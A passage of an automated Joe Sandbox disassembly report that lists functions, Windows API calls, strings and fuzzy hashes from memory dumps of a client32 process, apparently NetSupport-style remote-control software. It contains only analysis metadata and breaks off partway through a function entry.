Opcode Fuzzy Hash: 4cf07edff2dc204f15538a2f7aae05fd5e90645a6e982b2df453630d2fbad792
Instruction Fuzzy Hash: 7C2157349402889FDF12EB788C54BEA3BE6DB6A308FC000D8DD695B181D7704D45C792

Function 68597DE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68597E0E
EnterCriticalSection.KERNEL32(685DB898,?,?,?,00000000), ref: 68597EB7
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,00000000), ref: 68597ED0

Strings

b, xrefs: 68597EA2
RESULT, xrefs: 68597E40

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave_memset
String ID: RESULT$b
API String ID: 3751686142-4141403093
Opcode ID: a96e0333ae7cb6d1e73637153b6862fdea01ddb123530bc8d700d43756b20aed
Instruction ID: a63f027b05deb2bcfac3b1eefe3d27bed1cb22870ce84a5912092fe3bf07f1e3
Opcode Fuzzy Hash: a96e0333ae7cb6d1e73637153b6862fdea01ddb123530bc8d700d43756b20aed
Instruction Fuzzy Hash: 28216DB1D00208AEDF00DFA8C8457AEBBB5FB49304F8140AAD859E6280EB355E448BA5

Function 6859BE00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6859BE64
_strncpy.LIBCMT ref: 6859BE9D

Strings

sv.slavetype == APP_SLAVE, xrefs: 6859BE33
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6859BE0E, 6859BE2E
apptype == APP_SLAVE, xrefs: 6859BE13

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _memset_strncpy
String ID: apptype == APP_SLAVE$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$sv.slavetype == APP_SLAVE
API String ID: 3140232205-2748231828
Opcode ID: 7e40c6d7eb7de5a8faa91f28a454c97a0b75b4e114a52278b8922e585d326e83
Instruction ID: 6860875bad1e82cfaa4f017d72a361e63720c14ad6a8b80ad64b0af2631a3704
Opcode Fuzzy Hash: 7e40c6d7eb7de5a8faa91f28a454c97a0b75b4e114a52278b8922e585d326e83
Instruction Fuzzy Hash: 2411E737680375A7FF10595DAC06BEE73AC8B52659F810025FE18A63C1E371AD98C39B

Function 1113F370 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 1113F39E
_memmove.LIBCMT ref: 1113F3ED

Strings

Windows, xrefs: 1113F399
Device, xrefs: 1113F394
,,LPT1:, xrefs: 1113F38F

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProfileString_memmove
String ID: ,,LPT1:$Device$Windows
API String ID: 1665476579-2967085602
Opcode ID: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
Instruction ID: bcd620f34367886d122ba7e5b4bc1f5e42e64e22dfa310253f00a50472163b57
Opcode Fuzzy Hash: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
Instruction Fuzzy Hash: 42112965A0425B9AEB108F24AD45BBAF768EF8520DF0040A8ED859714AEA316609C7B3

Function 685AFDE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 685AFE0A
EnterCriticalSection.KERNEL32 ref: 685AFE19
LeaveCriticalSection.KERNEL32 ref: 685AFE8C

Part of subcall function 685AF540: InitializeCriticalSection.KERNEL32(685DCF98,89DA8021,?,?,?,?,?,685CEFC8,000000FF), ref: 685AF574
Part of subcall function 685AF540: EnterCriticalSection.KERNEL32(685DCF98,89DA8021,?,?,?,?,?,685CEFC8,000000FF), ref: 685AF590
Part of subcall function 685AF540: LeaveCriticalSection.KERNEL32(685DCF98,?,?,?,?,?,685CEFC8,000000FF), ref: 685AF5D8

Strings

Refcount.cpp, xrefs: 685AFE76
p.second, xrefs: 685AFE7B

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$CurrentInitializeThread
String ID: Refcount.cpp$p.second
API String ID: 2150084884-1554893322
Opcode ID: 72e1c82c3db0f6ddc629d461a9baae5b3dc115b08a82ed59b516ba7cbe8ca51c
Instruction ID: 82dfdc97d1109b29ea20c6c21c06998a38accdf29b00e103d475a0ec0798b090
Opcode Fuzzy Hash: 72e1c82c3db0f6ddc629d461a9baae5b3dc115b08a82ed59b516ba7cbe8ca51c
Instruction Fuzzy Hash: D6218476900209EFCB11DF94D881FFFB7B8FB19314F50411AE912A3640D7706905CBA5

Function 685960D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

__wcstoui64.LIBCMT ref: 68596107

Part of subcall function 685B49AE: strtoxl.LIBCMT ref: 685B49D0

EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,?,?,?,?,?,?,?,?,a3Zh), ref: 68596129
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,?,?,?,?,?,a3Zh,?,?,a3Zh), ref: 68596168

Strings

a3Zh, xrefs: 685960D4
CONNECTION_ID, xrefs: 685960F0

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave__wcstoui64strtoxl
String ID: CONNECTION_ID$a3Zh
API String ID: 2450600163-4042487306
Opcode ID: 08565a8c8f094bba72c149b1d3157ff892c2acd3c82ce53916afd919921944ba
Instruction ID: 197ebebdc615dfee0f6cae42d5b810645eb4da9ba0ffc776770a82b4bed84324
Opcode Fuzzy Hash: 08565a8c8f094bba72c149b1d3157ff892c2acd3c82ce53916afd919921944ba
Instruction Fuzzy Hash: 2211577AA003C07BEF1056D88C8076F33E69B82394F860035EE6653203F730A94986D7

Function 685AB960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 63COMMON

Download Yara Rule

APIs

__strdup.LIBCMT ref: 685AB997

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 685AB981, 685AB9B3
NSMString.cpp, xrefs: 685AB9FA
*this==src, xrefs: 685AB9FF
IsA(), xrefs: 685AB986, 685AB9B8

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: __strdup
String ID: *this==src$IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 838363481-1357550281
Opcode ID: 761f758348dd04650ceb551f35ae92cd56d4a8db723fbaaf6a8e8e7d59410c5e
Instruction ID: aacf58824021b290d8ae50b648516e3cccfd6f49387ca27d8793d0643bb38f04
Opcode Fuzzy Hash: 761f758348dd04650ceb551f35ae92cd56d4a8db723fbaaf6a8e8e7d59410c5e
Instruction Fuzzy Hash: 1511087564070AAFCB00EF1CDC95D3EB7E9AFCA248B808025E998A7301E771BC1547D6

Function 685AFFC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57threadwindowsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 685AFFD8

Part of subcall function 685ADAC0: SetEvent.KERNEL32(00000000), ref: 685ADAE4

WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 685B000C

Part of subcall function 685AFBC0: EnterCriticalSection.KERNEL32(?,?,75BF3550,685B001D), ref: 685AFBC8
Part of subcall function 685AFBC0: LeaveCriticalSection.KERNEL32(?), ref: 685AFBD5

PostMessageA.USER32(?,00000501,00000000,00000000), ref: 685B0034
PostThreadMessageA.USER32(?,00000501,00000000,00000000), ref: 685B003B

Strings

Queue, xrefs: 685AFFC4

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalMessagePostSectionThread$CurrentEnterEventLeaveObjectSingleWait
String ID: Queue
API String ID: 620033763-3191623783
Opcode ID: ac28e5f4d1ffac16dbc510ae5d610daa3d4224282cd7df1ed5a3209984a5edd5
Instruction ID: 66180c00c9694a7332958dd7b552af92cae2674b2f01866e6182807ea18c3e1a
Opcode Fuzzy Hash: ac28e5f4d1ffac16dbc510ae5d610daa3d4224282cd7df1ed5a3209984a5edd5
Instruction Fuzzy Hash: 5D11AC79640609DBDA10DBA4C8A0B9F73A4AF9A3A4F814426EC159B380DB70EC40CB99

Function 11141070 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1114107C
_memset.LIBCMT ref: 11141098
GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 111410B6
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 111410DF

Strings

0, xrefs: 111410A8

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$Count_memset
String ID: 0
API String ID: 162323998-4108050209
Opcode ID: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
Instruction ID: 2bcd32ba99f467236d3458310ced708016d2ad859b25bc85d693658704d9c718
Opcode Fuzzy Hash: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
Instruction Fuzzy Hash: E0016171A11219BBDB10DF95DD89FDEFBBCEB45758F108115F914E3140D7B0660487A1

Function 11141100 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,?,00000058,7E4636A2), ref: 11141118
wsprintfA.USER32 ref: 1114112E

Strings

..\ctl32\util.cpp, xrefs: 11141140
#%d, xrefs: 11141128
i < cchBuf, xrefs: 11141145

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LoadStringwsprintf
String ID: #%d$..\ctl32\util.cpp$i < cchBuf
API String ID: 104907563-3240211118
Opcode ID: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
Instruction ID: e2aba8975d0064ad862be08188f807418d6f8eeb8e9cddff9dd8f2c53222b253
Opcode Fuzzy Hash: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
Instruction Fuzzy Hash: 40F0F67AB011297BDB018BA99C84DDFB76CEF85A98B144021FA0893200EA31BA01C3A5

Function 685ADBD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 685ADBE9

Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE

wsprintfA.USER32 ref: 685ADC04
_memset.LIBCMT ref: 685ADC27

Strings

Refcount.cpp, xrefs: 685ADC15
Can't alloc %u bytes, xrefs: 685ADBFE

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc_memsetwsprintf
String ID: Can't alloc %u bytes$Refcount.cpp
API String ID: 2405090531-3988092936
Opcode ID: 84840fa68ed9dbc4bd2914ebd92bcef87d2fe5d36eb5bde29d66e859ae3eb828
Instruction ID: 94a70ffcd2985c1c4c6c24ffa661c7eca0a0884173c8121f0f48620d836b4cdf
Opcode Fuzzy Hash: 84840fa68ed9dbc4bd2914ebd92bcef87d2fe5d36eb5bde29d66e859ae3eb828
Instruction Fuzzy Hash: 8CF02BB6D40118B7C710AAA8AC05EEFB7BC9FD6644F800099FF04A7141E634AE05C7D9

Function 685AABC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 685AABDA

Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 685AABF9
NSMString.cpp, xrefs: 685AAC16
IsA(), xrefs: 685AABFE
IsEmpty(), xrefs: 685AAC1B

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID: IsA()$IsEmpty()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 501242067-2615622132
Opcode ID: f99083760092ffc4e6a413559e9090024aa4e503b87bcb0307a28c5f5d6cca45
Instruction ID: e0416cbc78300c481d3472d48c3da09239ca3b33e8aa5f7af95c181342031d2d
Opcode Fuzzy Hash: f99083760092ffc4e6a413559e9090024aa4e503b87bcb0307a28c5f5d6cca45
Instruction Fuzzy Hash: B1F0BEB26403009FD720DF4CDC51B2AB7D8DF59704F808429EA9CA7385E371BC448BAA

Function 685ADA56 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,?,?,00000000), ref: 685ADA6A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000), ref: 685ADA97
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 685ADAA1

Strings

Refcount.cpp, xrefs: 685ADA7B
hThread, xrefs: 685ADA80

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleObjectSingleThreadWait
String ID: Refcount.cpp$hThread
API String ID: 51348343-1332212576
Opcode ID: 967a51451ece59dda9a0d9c9808888f7cde3726fe62ecc27943a71810387db1a
Instruction ID: 5a9711dcfcb0a50a41a53ff00934578ee2b9360e4e95e78665a00281a68c3042
Opcode Fuzzy Hash: 967a51451ece59dda9a0d9c9808888f7cde3726fe62ecc27943a71810387db1a
Instruction Fuzzy Hash: E5F0A776348301AFDB109B949C99F5F7BA9DB81362F004219FE55922C1D920D4098765

Function 11085290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(cenctrl.dll), ref: 110852BE
GetProcAddress.KERNEL32(00000000,cenctrl_protection), ref: 110852D0

Part of subcall function 11085260: FreeLibrary.KERNEL32(00000000,?,110852E4), ref: 1108526A

Strings

cenctrl.dll, xrefs: 110852B9
cenctrl_protection, xrefs: 110852CA
EDC, xrefs: 1108529D

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EDC$cenctrl.dll$cenctrl_protection
API String ID: 145871493-3137230561
Opcode ID: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
Instruction ID: d397d68d13e32483cc8c89d25abb01868daaac96927e0e05309bf2cb32c419b9
Opcode Fuzzy Hash: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
Instruction Fuzzy Hash: 42F02278E0832367EB01AF38BC0978E7AC85B0231CF410437F845EA20AFD22E04047A3

Function 11017050 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017058
GetWindowLongA.USER32(00000000,000000F0), ref: 11017067
PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017088
